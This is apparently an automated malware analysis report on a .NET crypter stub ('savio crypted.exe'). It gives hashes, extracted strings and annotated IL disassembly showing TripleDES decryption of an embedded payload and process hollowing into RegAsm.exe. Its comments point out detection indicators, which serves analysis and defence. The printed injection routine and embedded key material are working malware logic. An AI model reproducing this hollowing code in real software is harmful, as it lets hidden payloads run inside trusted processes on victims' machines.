File Information hashes and primary classification
File name
4
File size
361.0 KiB
Architecture
DOTNET
- MD5
- 15fffb2ca22665c1d04731a250513f5c
- SHA1
- 6a187370998da0095ffa6c4f8dfe094d501bdc65
- SHA256
- 674f19126e6dcf0ebb2bf9944841c4cd43195f73b006d51826c7c4252a7e2122
- TLSH
- T1577428343dfa501ab173ef698be479aada6fb7733b07645d1090038a4713a41ee8153e
- Imphash
- f34d5f2d4577ed6d9ceec516c1f5a744
- Rich header
- -
Metadata parser-extracted fields
YARA Signatures 2 matching rules
Type.INFO
compiler
MSVC_2012_linker
language
DotNet
Kesakode similarity verdict
SolarMarker
4.5%
KingBong
0.2%
ZeusSphinx
0.2%
1 malware hits
0 library hits
139 clean hits
Anomalies signals worth reviewing
strings:
BigStringHiScore
HugeStringBase64
StringBase64
VeryHugeString
imports:
DotnetCryptoApiUsage
ExternalModule
NativeMethods
integrity:
NoChecksum
Constants identified constants and patterns
No known constants identified.
Strings highest-value extracted strings
| Address | String | Refs | Encoding | Score |
|---|---|---|---|---|
| 0x403371 | fK2NaQxHVYZVTAo+NeLyWNkLgGEftbGesHRcaw9AFdWrg5HoeBHKyOBbcUT+eqzd8nvj1VXTk3lt9PAQZDzMseR1DiDeuCGwiiWWSPHAsUT2Pyy5wzrZ6... | 1 | UTF16 | 210 |
| 0x403315 | iA9B1uKFddQdqiLSSuzvD2GhL1o2Jv+v | 1 | UTF16 | 187 |
| 0x403357 | b2CBFvcQeV4= | 1 | UTF16 | 166 |
| 0x45A38E | RegAsm.exe | 1 | UTF16 | 154 |
| 0x402F80 | ntdll.dll | 1 | UTF8 | 152 |
| 0x45A3A4 | Process creation failed. | 1 | UTF16 | 147 |
| 0x402F73 | kernel32.dll | 1 | UTF8 | 146 |
| 0x45A44C | SetThreadContext failed | 1 | UTF16 | 145 |
| 0x45A3F4 | Failed to read memory | 1 | UTF16 | 145 |
| 0x45A420 | VirtualAllocEx failed | 1 | UTF16 | 142 |
| 0x402FD7 | DebuggerStepThroughAttribute | 1 | UTF8 | 142 |
| 0x402F14 | CompilationRelaxationsAttribute | 1 | UTF8 | 141 |
| 0x402B66 | savio crypted.exe | 1 | UTF8 | 141 |
| 0x402F34 | RuntimeCompatibilityAttribute | 1 | UTF8 | 140 |
| 0x402EC9 | SecurityPermissionAttribute | 1 | UTF8 | 139 |
| 0x4030C3 | DebuggerHiddenAttribute | 1 | UTF8 | 139 |
| 0x4030DB | AsyncStateMachineAttribute | 1 | UTF8 | 138 |
| 0x40328A | CompilerGeneratedAttribute | 1 | UTF8 | 137 |
| 0x4032F7 | UnverifiableCodeAttribute | 1 | UTF8 | 136 |
| 0x4032A5 | StructLayoutAttribute | 1 | UTF8 | 135 |
| 0x403064 | RuntimeEnvironment | 1 | UTF8 | 135 |
| 0x45A3D6 | Context failed | 1 | UTF16 | 133 |
| 0x402EAD | System.Security.Permissions | 2 | UTF8 | 133 |
| 0x4032C6 | MarshalAsAttribute | 1 | UTF8 | 133 |
| 0x402EA2 | FHJASDFJHA | 1 | UTF8 | 133 |
| 0x402EF4 | System.Runtime.CompilerServices | 7 | UTF8 | 132 |
| 0x402DCA | System.Runtime.InteropServices | 8 | UTF8 | 132 |
| 0x402C6D | System.Threading.Tasks | 1 | UTF8 | 132 |
| 0x402D3F | lpProcessAttributes | 1 | UTF8 | 132 |
| 0x403077 | GetRuntimeDirectory | 1 | UTF8 | 132 |
| 0x403197 | CreateDecryptor | 1 | UTF8 | 132 |
| 0x402E71 | baseAddress | 1 | UTF8 | 132 |
| 0x402D94 | lpCurrentDirectory | 1 | UTF8 | 131 |
| 0x403002 | IAsyncStateMachine | 1 | UTF8 | 131 |
| 0x402F60 | DllImportAttribute | 1 | UTF8 | 131 |
| 0x403138 | SymmetricAlgorithm | 1 | UTF8 | 131 |
| 0x402D1F | lpApplicationName | 1 | UTF8 | 131 |
| 0x402DE9 | OutAttribute | 1 | UTF8 | 131 |
| 0x403111 | System.Security.Cryptography | 7 | UTF8 | 130 |
| 0x402E46 | lpNumberOfBytesWritten | 1 | UTF8 | 130 |
| 0x402DB5 | lpProcessInformation | 1 | UTF8 | 130 |
| 0x402D53 | lpThreadAttributes | 1 | UTF8 | 129 |
| 0x4031C8 | CryptoStreamMode | 1 | UTF8 | 129 |
| 0x4032E7 | System.Security | 1 | UTF8 | 129 |
| 0x402E97 | targetPath | 1 | UTF8 | 129 |
| 0x402CE2 | hStdOutput | 1 | UTF8 | 129 |
| 0x4031A7 | MemoryStream | 1 | UTF8 | 128 |
| 0x403226 | BitConverter | 1 | UTF8 | 128 |
| 0x403039 | AsyncTaskMethodBuilder | 1 | UTF8 | 127 |
| 0x403186 | ICryptoTransform | 1 | UTF8 | 127 |
| 0x402E11 | flAllocationType | 1 | UTF8 | 127 |
| 0x4031DF | FlushFinalBlock | 1 | UTF8 | 127 |
| 0x402EE5 | SecurityAction | 1 | UTF8 | 127 |
| 0x4032D9 | UnmanagedType | 1 | UTF8 | 127 |
| 0x402C99 | InjectProcess | 1 | UTF8 | 127 |
| 0x403265 | GetBytes | 1 | UTF8 | 127 |
| 0x40301E | SetStateMachine | 3 | UTF8 | 126 |
| 0x4030B9 | SetResult | 1 | UTF8 | 126 |
| 0x402E00 | lpAddress | 1 | UTF8 | 126 |
| 0x402CED | hStdError | 1 | UTF8 | 126 |
| 0x402FBA | GetResult | 1 | UTF8 | 126 |
| 0x403285 | Kill | 1 | UTF8 | 126 |
| 0x402E92 | data | 1 | UTF8 | 126 |
| 0x402E5D | lpNumberOfBytesRead | 1 | UTF8 | 125 |
| 0x402C28 | WriteProcessMemory | 2 | UTF8 | 125 |
| 0x403276 | GetProcessById | 1 | UTF8 | 125 |
| 0x402DA7 | lpStartupInfo | 1 | UTF8 | 125 |
| 0x402FF4 | <RunStub>d__0 | 1 | UTF8 | 125 |
| 0x402D31 | lpCommandLine | 1 | UTF8 | 125 |
| 0x402B78 | NativeMethods | 1 | UTF8 | 125 |
| 0x402D86 | lpEnvironment | 1 | UTF8 | 125 |
| 0x4030AC | SetException | 1 | UTF8 | 125 |
| 0x4031B4 | CryptoStream | 1 | UTF8 | 125 |
| 0x402D08 | dwProcessId | 1 | UTF8 | 125 |
| 0x402CCC | lpReserved2 | 1 | UTF8 | 125 |
| 0x40316E | PaddingMode | 1 | UTF8 | 125 |
| 0x402BAF | ProcessInfo | 1 | UTF8 | 125 |
| 0x402D14 | dwThreadId | 1 | UTF8 | 125 |
| 0x402FAF | GetAwaiter | 1 | UTF8 | 125 |
| 0x402CAA | lpReserved | 1 | UTF8 | 125 |
| 0x40302E | <>1__state | 1 | UTF8 | 125 |
| 0x402D66 | bInheritHandles | 1 | UTF8 | 124 |
| 0x403102 | Start | 1 | UTF8 | 124 |
| 0x403255 | Array | 1 | UTF8 | 124 |
| 0x402C3B | ReadProcessMemory | 2 | UTF8 | 123 |
| 0x40326E | Process | 1 | UTF8 | 123 |
| 0x40314B | set_Key | 1 | UTF8 | 123 |
| 0x402CBF | lpTitle | 1 | UTF8 | 123 |
| 0x4031EF | ToArray | 1 | UTF8 | 123 |
| 0x403203 | Dispose | 1 | UTF8 | 123 |
| 0x40320B | Marshal | 1 | UTF8 | 123 |
| 0x402C89 | RunStub | 1 | UTF8 | 123 |
| 0x402B9B | Program | 1 | UTF8 | 123 |
| 0x40305D | param0 | 1 | UTF8 | 123 |
| 0x40321A | IntPtr | 1 | UTF8 | 123 |
| 0x40324E | Buffer | 1 | UTF8 | 123 |
| 0x402F92 | FromBase64String | 1 | UTF8 | 122 |
| 0x402D76 | dwCreationFlags | 1 | UTF8 | 122 |
| 0x402BDC | CreateProcess | 2 | UTF8 | 122 |
| 0x402E2C | lpBaseAddress | 2 | UTF8 | 122 |
| 0x403050 | <>t__builder | 1 | UTF8 | 122 |
| 0x402FA3 | TaskAwaiter | 1 | UTF8 | 122 |
| 0x40317A | set_Padding | 1 | UTF8 | 122 |
| 0x4031F7 | IDisposable | 1 | UTF8 | 122 |
| 0x402BA3 | StartupInfo | 1 | UTF8 | 122 |
| 0x40315A | CipherMode | 1 | UTF8 | 122 |
| 0x40325B | BlockCopy | 1 | UTF8 | 122 |
| 0x402BD2 | ValueType | 1 | UTF8 | 122 |
| 0x402CB5 | lpDesktop | 1 | UTF8 | 122 |
| 0x402CD8 | hStdInput | 1 | UTF8 | 122 |
| 0x402E22 | flProtect | 1 | UTF8 | 122 |
| 0x403165 | set_Mode | 1 | UTF8 | 122 |
| 0x402FC4 | System.Diagnostics | 3 | UTF8 | 121 |
| 0x402BF7 | GetThreadContext | 2 | UTF8 | 121 |
| 0x402C08 | SetThreadContext | 2 | UTF8 | 121 |
| 0x402C4D | NtUnmapViewOfSection | 2 | UTF8 | 120 |
| 0x402B86 | ProcessHollowingStub | 4 | UTF8 | 120 |
| 0x4032BB | LayoutKind | 1 | UTF8 | 118 |
| 0x40312E | TripleDES | 1 | UTF8 | 118 |
| 0x4030A2 | Exception | 1 | UTF8 | 118 |
| 0x403108 | get_Task | 1 | UTF8 | 118 |
| 0x402B5D | <Module> | 1 | UTF8 | 118 |
| 0x402BBB | mscorlib | 1 | UTF8 | 118 |
| 0x402C19 | VirtualAllocEx | 2 | UTF8 | 117 |
| 0x402E7D | base64Payload | 2 | UTF8 | 117 |
| 0x402BEA | ResumeThread | 2 | UTF8 | 117 |
| 0x403233 | ToInt32 | 1 | UTF8 | 117 |
| 0x403241 | ToInt16 | 1 | UTF8 | 117 |
| 0x402F8A | Convert | 1 | UTF8 | 117 |
| 0x402C91 | Decrypt | 1 | UTF8 | 117 |
| 0x40309A | Combine | 1 | UTF8 | 117 |
| 0x402BCB | Object | 1 | UTF8 | 117 |
| 0x403153 | set_IV | 1 | UTF8 | 117 |
| 0x4031C1 | Stream | 1 | UTF8 | 117 |
| 0x4031D9 | Write | 1 | UTF8 | 117 |
| 0x40323B | Int32 | 1 | UTF8 | 117 |
| 0x45D453 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifes... | 0 | ASCII | 116 |
| 0x402F52 | savio crypted | 1 | UTF8 | 116 |
| 0x402CC7 | misc | 1 | UTF8 | 116 |
| 0x403249 | Byte | 1 | UTF8 | 116 |
| 0x402C68 | Main | 1 | UTF8 | 116 |
| 0x402C84 | Task | 1 | UTF8 | 116 |
| 0x403221 | Zero | 1 | UTF8 | 116 |
| 0x403095 | Path | 1 | UTF8 | 116 |
| 0x4030F6 | Type | 1 | UTF8 | 116 |
| 0x402CA7 | cb | 1 | UTF8 | 116 |
| 0x45A75E | mscoree.dll | 1 | ASCII | 115 |
| 0x402D00 | hThread | 4 | UTF8 | 115 |
| 0x402E3A | buffer | 2 | UTF8 | 115 |
| 0x4030FB | Create | 2 | UTF8 | 115 |
| 0x402DF6 | lpContext | 2 | UTF8 | 114 |
| 0x403015 | MoveNext | 2 | UTF8 | 114 |
| 0x402CF7 | hProcess | 5 | UTF8 | 114 |
| 0x403213 | SizeOf | 1 | UTF8 | 111 |
| 0x402E0A | dwSize | 1 | UTF8 | 111 |
| 0x40308B | System.IO | 3 | UTF8 | 110 |
| 0x402BC4 | System | 13 | UTF8 | 109 |
| 0x402C62 | .ctor | 18 | UTF8 | 109 |
| 0x402E8B | key | 3 | UTF8 | 108 |
| 0x402E8F | iv | 3 | UTF8 | 108 |
| 0x45A67F | System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b... | 0 | ASCII | 102 |
| 0x402E41 | size | 2 | UTF8 | 99 |
| 0x4024D8 | BSJB | 1 | ASCII | 97 |
| 0x45C288 | savio crypted.exe | 0 | UTF16 | 88 |
| 0x45C2FC | savio crypted.exe | 0 | UTF16 | 88 |
| 0x45C1FA | 000004b0 | 0 | UTF16 | 83 |
| 0x45C136 | VS_VERSION_INFO | 0 | UTF16 | 81 |
| 0x45C2DA | OriginalFilename | 0 | UTF16 | 80 |
| 0x45C258 | 0.0.0.0 | 0 | UTF16 | 80 |
| 0x45C344 | 0.0.0.0 | 0 | UTF16 | 80 |
| 0x45C37C | 0.0.0.0 | 0 | UTF16 | 80 |
| 0x45A563 | *ProcessHollowingStub.Program+<RunStub>d__0 | 0 | ASCII | 74 |
| 0x45C212 | FileDescription | 0 | UTF16 | 73 |
| 0x45C26E | InternalName | 0 | UTF16 | 73 |
| 0x45C35A | Assembly Version | 0 | UTF16 | 71 |
| 0x45C1D6 | StringFileInfo | 0 | UTF16 | 71 |
| 0x45C326 | ProductVersion | 0 | UTF16 | 71 |
| - | !This program cannot be run in DOS mode.\r\r\n$ | 0 | ASCII | 70 |
| 0x45C23E | FileVersion | 0 | UTF16 | 70 |
| 0x45C1B2 | Translation | 0 | UTF16 | 70 |
| 0x45C2B2 | LegalCopyright | 0 | UTF16 | 68 |
| 0x45A662 | WrapNonExceptionThrows | 0 | ASCII | 65 |
| 0x45C192 | VarFileInfo | 0 | UTF16 | 64 |
| 0x4024E8 | v4.0.30319 | 0 | ASCII | 64 |
| 0x45A708 | SkipVerification | 0 | ASCII | 62 |
| - | .text | 0 | ASCII | 59 |
| - | `.rsrc | 0 | ASCII | 58 |
| 0x45A752 | _CorExeMain | 0 | ASCII | 53 |
| - | @.reloc | 0 | ASCII | 52 |
| 0x403313 | | 0 | UTF8 | 50 |
| 0x403312 | | 0 | UTF8 | 50 |
| 0x403311 | | 0 | UTF8 | 50 |
| 0x40250C | #Strings | 0 | ASCII | 48 |
| 0x40253C | #Blob | 0 | ASCII | 44 |
| 0x40252C | #GUID | 0 | ASCII | 44 |
| 0x4026FA | S* \n | 0 | UTF16 | 41 |
Functions high-value functions
Function listings
0x402250 InjectProcess str 5 api 0 imm 21 Unknown
; InjectProcess(targetPath, FHJASDFJHA): starts targetPath as a suspended child process and
; replaces its image with the PE file held in the FHJASDFJHA byte array (process hollowing,
; as the ProcessHollowingStub namespace states). Every offset below is read with 4-byte
; arithmetic, so the routine appears to assume a 32-bit payload and a 32-bit target.
; Observable API sequence for detection: CreateProcess (suspended) -> GetThreadContext ->
; ReadProcessMemory -> NtUnmapViewOfSection -> VirtualAllocEx (RWX) -> WriteProcessMemory
; (repeated) -> SetThreadContext. The listing is cut off after SetThreadContext, so the
; resume/cleanup path is not shown here.
void ProcessHollowingStub.Program.InjectProcess(string targetPath, byte[] FHJASDFJHA) {
ldloca.s local0
initobj ProcessHollowingStub.ProcessInfo
; local1 = 0, then jump to label .13, which lies in the truncated part of the listing
; (possibly a loop/retry header; cannot be confirmed from the visible lines).
ldc.i4 0x0
stloc local1
br .13
.1:
; local2 = zeroed StartupInfo with cb set to its marshalled size.
ldloca.s local2
initobj ProcessHollowingStub.StartupInfo
ldloca.s local2
ldloc local2
call System.Runtime.InteropServices.Marshal.SizeOf
stfld ProcessHollowingStub.StartupInfo.cb
; CreateProcess(targetPath, null, Zero, Zero, false, 0x8000004, Zero, null, ref local2, ref local0).
; 0x8000004 = CREATE_NO_WINDOW (0x08000000) | CREATE_SUSPENDED (0x4): the child never runs its
; own code and shows no console. A signed host binary launched suspended with a null command
; line is a useful hunting pivot.
ldarg targetPath
ldnull
ldsfld [System.IntPtr.Zero]
ldsfld [System.IntPtr.Zero]
ldc.i4 0x0
ldc.i4 0x8000004
ldsfld [System.IntPtr.Zero]
ldnull
ldloca.s local2
ldloca.s local0
call [kernel32.CreateProcess]
stloc local3
ldloc local3
brtrue.s .2
ldstr "Process creation failed."
newobj [System.Exception.ctor]
throw
.2:
; local4 = Int32 at payload offset 0x3C (the e_lfanew field of a DOS header, i.e. the offset
; of the NT headers, assuming the payload is a PE file).
ldarg FHJASDFJHA
ldc.i4 0x3c
call [System.BitConverter.ToInt32]
stloc.s local4
; local5 = Int32 at NT headers + 0x34, which matches ImageBase in a PE32 optional header.
ldarg FHJASDFJHA
ldloc.s local4
ldc.i4 0x34
add
call [System.BitConverter.ToInt32]
stloc.s local5
; local6 = int[0xB3] (716 bytes, the size of an x86 CONTEXT) used as the thread-context buffer.
; Element 0 (ContextFlags) = 0x10002, i.e. CONTEXT_i386 | CONTEXT_INTEGER.
ldc.i4 0xb3
newarr System.Int32
stloc.s local6
ldloc.s local6
ldc.i4 0x0
ldc.i4 0x10002
stelem.i4
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hThread
ldloc.s local6
call [kernel32.GetThreadContext]
brtrue.s .3
ldstr "Context failed"
newobj [System.Exception.ctor]
throw
.3:
; Reads 4 bytes from the child at local6[0x29] + 8 into local7. Index 0x29 is byte offset 0xA4
; of the buffer, which matches Ebx in the x86 CONTEXT layout; for a freshly created suspended
; process that register is commonly the PEB address, making +8 the PEB image-base field.
; NOTE(review): register/PEB interpretation is inferred from the offsets, not stated by the code.
ldc.i4 0x0
stloc.s local7
ldc.i4 0x0
stloc.s local8
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hProcess
ldloc.s local6
ldc.i4 0x29
ldelem.i4
ldc.i4 0x8
add
ldloca.s local7
ldc.i4 0x4
ldloca.s local8
call [kernel32.ReadProcessMemory]
brtrue.s .4
ldstr "Failed to read memory"
newobj [System.Exception.ctor]
throw
.4:
; The original image is unmapped only when the child's current base (local7) equals the
; payload's preferred base (local5). The NtUnmapViewOfSection status is discarded (pop).
ldloc.s local7
ldloc.s local5
bne.un.s .5
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hProcess
ldloc.s local7
call [ntdll.NtUnmapViewOfSection]
pop
.5:
; local9 = Int32 at NT headers + 0x50 (matches SizeOfImage in a PE32 optional header).
ldarg FHJASDFJHA
ldloc.s local4
ldc.i4 0x50
add
call [System.BitConverter.ToInt32]
stloc.s local9
; VirtualAllocEx(hProcess, local5, local9, 0x3000, 0x40):
; 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE. A remote RWX region of
; image size at a fixed preferred base is a strong memory-forensics indicator.
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hProcess
ldloc.s local5
ldloc.s local9
ldc.i4 0x3000
ldc.i4 0x40
call [kernel32.VirtualAllocEx]
stloc.s local10
ldloc.s local10
brtrue.s .6
ldstr "VirtualAllocEx failed"
newobj [System.Exception.ctor]
throw
.6:
; local12 = Int32 at NT headers + 0x54 (matches SizeOfHeaders); that many bytes from the start
; of the payload are written to the new region. The WriteProcessMemory result is not checked.
ldc.i4 0x0
stloc.s local11
ldarg FHJASDFJHA
ldloc.s local4
ldc.i4 0x54
add
call [System.BitConverter.ToInt32]
stloc.s local12
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hProcess
ldloc.s local10
ldarg FHJASDFJHA
ldloc.s local12
ldloca.s local11
call [kernel32.WriteProcessMemory]
pop
; local13 = Int16 at NT headers + 6 (matches NumberOfSections).
ldarg FHJASDFJHA
ldloc.s local4
ldc.i4 0x6
add
call [System.BitConverter.ToInt16]
stloc.s local13
; local14 = NT headers + 0xF8, the first section header when the optional header is the
; PE32 size; local15 is the section loop counter.
ldloc.s local4
ldc.i4 0xf8
add
stloc.s local14
ldc.i4 0x0
stloc.s local15
br.s .9
.7:
; Per section header: +0x0C -> local16 (matches VirtualAddress), +0x10 -> local17 (matches
; SizeOfRawData), +0x14 -> local18 (matches PointerToRawData).
ldarg FHJASDFJHA
ldloc.s local14
ldc.i4 0xc
add
call [System.BitConverter.ToInt32]
stloc.s local16
ldarg FHJASDFJHA
ldloc.s local14
ldc.i4 0x10
add
call [System.BitConverter.ToInt32]
stloc.s local17
ldarg FHJASDFJHA
ldloc.s local14
ldc.i4 0x14
add
call [System.BitConverter.ToInt32]
stloc.s local18
; Sections with no raw data are skipped; otherwise the raw bytes are copied into a temporary
; array and written to (allocated base + local16) in the child. Result again discarded.
ldloc.s local17
brzero.s .8
ldloc.s local17
newarr System.Byte
stloc.s local19
ldarg FHJASDFJHA
ldloc.s local18
ldloc.s local19
ldc.i4 0x0
ldloc.s local17
call [System.Buffer.BlockCopy]
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hProcess
ldloc.s local10
ldloc.s local16
add
ldloc.s local19
ldloc.s local17
ldloca.s local11
call [kernel32.WriteProcessMemory]
pop
.8:
; Advance to the next section header (0x28 bytes each) and bump the counter.
ldloc.s local14
ldc.i4 0x28
add
stloc.s local14
ldloc.s local15
ldc.i4 0x1
add
stloc.s local15
.9:
ldloc.s local15
ldloc.s local13
blt.s .7
; Writes the 4-byte allocated base (local10) back to the same child address that was read at
; label .3 (local6[0x29] + 8), so the child's recorded image base points at the new image.
ldloc.s local10
call [System.BitConverter.GetBytes]
stloc.s local20
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hProcess
ldloc.s local6
ldc.i4 0x29
ldelem.i4
ldc.i4 0x8
add
ldloc.s local20
ldc.i4 0x4
ldloca.s local11
call [kernel32.WriteProcessMemory]
pop
; local21 = Int32 at NT headers + 0x28 (matches AddressOfEntryPoint).
ldarg FHJASDFJHA
ldloc.s local4
ldc.i4 0x28
add
call [System.BitConverter.ToInt32]
stloc.s local21
; local6[0x2C] = allocated base + local21. Index 0x2C is byte offset 0xB0, which matches Eax in
; the x86 CONTEXT layout; the modified context is then applied to the suspended main thread.
ldloc.s local6
ldc.i4 0x2c
ldloc.s local10
ldloc.s local21
add
stelem.i4
ldloca.s local0
ldfld ProcessHollowingStub.ProcessInfo.hThread
ldloc.s local6
call [kernel32.SetThreadContext]
; Branch target .10 is in the truncated part. The "SetThreadContext failed" string and the
; ResumeThread / Kill / GetProcessById references in the strings table are presumably used
; there, but that cannot be confirmed from this listing.
brtrue.s .10
; listing truncated
0x402064 DotNetEntryPoint str 3 api 5 imm 0 Unknown
; Entry point: decodes the embedded key and IV, then passes them with the embedded
; Base64 payload string to RunStub and blocks until the returned task finishes.
; Key, IV and ciphertext are all hard-coded in the binary, so the payload can be recovered
; statically for analysis without executing the sample.
void DotNetEntryPoint() {
; local0 = key: the Base64 literal decodes to 24 bytes (three-key TripleDES key length).
ldstr "iA9B1uKFddQdqiLSSuzvD2GhL1o2Jv+v"
call [System.Convert.FromBase64String]
stloc local0
; local1 = IV: the Base64 literal decodes to 8 bytes (one TripleDES block).
ldstr "b2CBFvcQeV4="
call [System.Convert.FromBase64String]
stloc local1
; local2 = encrypted payload, still Base64 text. The ".." in the literal is the listing tool's
; elision; the full string is the 0x403371 entry in the strings table.
ldstr "fK2NaQxHVYZVTAo+NeLyWNkLgGEftbGe..c7KJLdW7aAgICsJ0QOkQU76195y+7NA="
stloc local2
ldloc local2
ldloc local0
ldloc local1
call System.Threading.Tasks.Task ProcessHollowingStub.Program.RunStub(string base64Payload, byte[] key, byte[] iv)
; Synchronous wait: GetAwaiter().GetResult() rethrows any exception stored on the task.
callvirt [System.Threading.Tasks.Task.GetAwaiter]
stloc local3
ldloca.s local3
call [System.Runtime.CompilerServices.TaskAwaiter.GetResult]
ret
}
0x4020A4 MoveNext str 1 api 2 imm 4 Unknown
; Compiler-generated state-machine body of the async RunStub method. No await/suspension point
; is visible in this listing, so the work below runs in a single MoveNext call:
; Base64-decode -> Decrypt -> InjectProcess into RegAsm.exe from the .NET runtime directory.
void ProcessHollowingStub.Program.<RunStub>d__0.MoveNext(ProcessHollowingStub.Program.<RunStub>d__0 this) {
; local2 = 1; its purpose is not evident from the visible code.
ldc.i4 0x1
stloc local2
; local0 = Decrypt(Convert.FromBase64String(this.base64Payload), this.key, this.iv)
ldarg this
ldfld ProcessHollowingStub.Program.<RunStub>d__0.base64Payload
call [System.Convert.FromBase64String]
ldarg this
ldfld ProcessHollowingStub.Program.<RunStub>d__0.key
ldarg this
ldfld ProcessHollowingStub.Program.<RunStub>d__0.iv
call byte[] ProcessHollowingStub.Program.Decrypt(byte[] data, byte[] key, byte[] iv)
stloc local0
; A null result skips injection and completes the task normally.
ldloc local0
brtrue.s .1
leave.s .2
.1:
; local1 = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "RegAsm.exe"): the host
; process is the RegAsm.exe shipped with the running .NET Framework. For detection, RegAsm.exe
; spawned by an unrelated parent with no arguments is the process-tree indicator of this stub.
call [System.Runtime.InteropServices.RuntimeEnvironment.GetRuntimeDirectory]
ldstr "RegAsm.exe"
call [System.IO.Path.Combine]
stloc local1
ldloc local1
ldloc local0
call void ProcessHollowingStub.Program.InjectProcess(string targetPath, byte[] FHJASDFJHA)
leave.s .2
; The next block appears to be the catch handler (the tool does not print region markers):
; it stores the exception, sets the state to -2 and reports the exception through the builder.
stloc local3
ldarg this
ldc.i4 -0x2
stfld ProcessHollowingStub.Program.<RunStub>d__0.<>1__state
ldarg this
ldflda ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
ldloc local3
call [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.SetException]
leave.s .3
.2:
; Normal completion: state = -2, then SetResult on the builder.
ldarg this
ldc.i4 -0x2
stfld ProcessHollowingStub.Program.<RunStub>d__0.<>1__state
ldarg this
ldflda ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
call [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.SetResult]
.3:
ret
}
0x402190 Decrypt str 0 api 2 imm 3 Unknown
; Decrypt(data, key, iv): TripleDES decryption of data using the supplied key and IV.
; Returns the plaintext bytes taken from a MemoryStream. Mode and padding are set explicitly
; below, so an analyst can reproduce the decryption offline with the same parameters.
byte[] ProcessHollowingStub.Program.Decrypt(byte[] data, byte[] key, byte[] iv) {
; local0 = TripleDES.Create(), then Key and IV are assigned from the arguments.
call [System.Security.Cryptography.TripleDES.Create]
stloc local0
ldloc local0
ldarg key
callvirt [System.Security.Cryptography.SymmetricAlgorithm.set_Key]
ldloc local0
ldarg iv
callvirt [System.Security.Cryptography.SymmetricAlgorithm.set_IV]
; Mode = 1, which is CipherMode.CBC.
ldloc local0
ldc.i4 0x1
callvirt [System.Security.Cryptography.SymmetricAlgorithm.set_Mode]
; Padding = 2, which is PaddingMode.PKCS7.
ldloc local0
ldc.i4 0x2
callvirt [System.Security.Cryptography.SymmetricAlgorithm.set_Padding]
; local1 = decryptor transform, local2 = output MemoryStream,
; local3 = CryptoStream over local2 with mode 1 (CryptoStreamMode.Write).
ldloc local0
callvirt [System.Security.Cryptography.SymmetricAlgorithm.CreateDecryptor]
stloc local1
newobj [System.IO.MemoryStream.ctor]
stloc local2
ldloc local2
ldloc local1
ldc.i4 0x1
newobj [System.Security.Cryptography.CryptoStream.ctor]
stloc local3
; Write the whole input through the decryptor, flush the final block, and capture the result.
ldloc local3
ldarg data
ldc.i4 0x0
ldarg data
ldlen
conv.i4
callvirt [System.IO.Stream.Write]
ldloc local3
callvirt [System.Security.Cryptography.CryptoStream.FlushFinalBlock]
ldloc local2
callvirt [System.IO.MemoryStream.ToArray]
stloc.s local4
leave.s .5
; Four finally handlers follow (region markers are not printed by the tool); each disposes one
; of local3, local2, local1, local0 if it is non-null.
ldloc local3
brzero.s .1
ldloc local3
callvirt [System.IDisposable.Dispose]
.1:
endfinally
ldloc local2
brzero.s .2
ldloc local2
callvirt [System.IDisposable.Dispose]
.2:
endfinally
ldloc local1
brzero.s .3
ldloc local1
callvirt [System.IDisposable.Dispose]
.3:
endfinally
ldloc local0
brzero.s .4
ldloc local0
callvirt [System.IDisposable.Dispose]
.4:
endfinally
.5:
ldloc.s local4
ret
}
0x402051 ctor str 0 api 1 imm 0 Unknown
; Default constructor of NativeMethods: only chains to System.Object's constructor.
void ProcessHollowingStub.NativeMethods.ctor(ProcessHollowingStub.NativeMethods this) {
ldarg this
call [System.Object.ctor]
ret
}
0x40211D SetStateMachine str 0 api 1 imm 0 Unknown
; Compiler-generated IAsyncStateMachine.SetStateMachine: forwards the supplied state machine
; (arg0) to the AsyncTaskMethodBuilder stored in <>t__builder. No sample-specific logic.
void ProcessHollowingStub.Program.<RunStub>d__0.SetStateMachine(ProcessHollowingStub.Program.<RunStub>d__0 this, System.Runtime.CompilerServices.IAsyncStateMachine, ) {
ldarg this
ldflda ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
ldarg arg0
call [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.SetStateMachine]
ret
}
0x4024D1 ctor str 0 api 0 imm 0 Unknown
; Default constructor of Program: only chains to the NativeMethods constructor, which suggests
; Program derives from NativeMethods (the P/Invoke holder).
void ProcessHollowingStub.Program.ctor(ProcessHollowingStub.Program this) {
ldarg this
call void ProcessHollowingStub.NativeMethods.ctor(ProcessHollowingStub.NativeMethods this)
ret
}
0x402138 RunStub str 0 api 3 imm 1 Clean
; RunStub(base64Payload, key, iv): compiler-generated kickoff for the async method. It copies
; the three arguments into the <RunStub>d__0 state machine (local0), creates the task builder,
; sets the initial state to -1, starts the state machine (which runs MoveNext) and returns the
; builder's Task. The decrypt-and-inject logic itself lives in <RunStub>d__0.MoveNext.
System.Threading.Tasks.Task ProcessHollowingStub.Program.RunStub(string base64Payload, byte[] key, byte[] iv) {
; Capture arguments as state-machine fields.
ldloca.s local0
ldarg base64Payload
stfld ProcessHollowingStub.Program.<RunStub>d__0.base64Payload
ldloca.s local0
ldarg key
stfld ProcessHollowingStub.Program.<RunStub>d__0.key
ldloca.s local0
ldarg iv
stfld ProcessHollowingStub.Program.<RunStub>d__0.iv
; <>t__builder = AsyncTaskMethodBuilder.Create(); <>1__state = -1.
ldloca.s local0
call [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.Create]
stfld ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
ldloca.s local0
ldc.i4 -0x1
stfld ProcessHollowingStub.Program.<RunStub>d__0.<>1__state
; Start is invoked on a copy of the builder (local1) with a reference to the state machine.
ldloca.s local0
ldfld ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
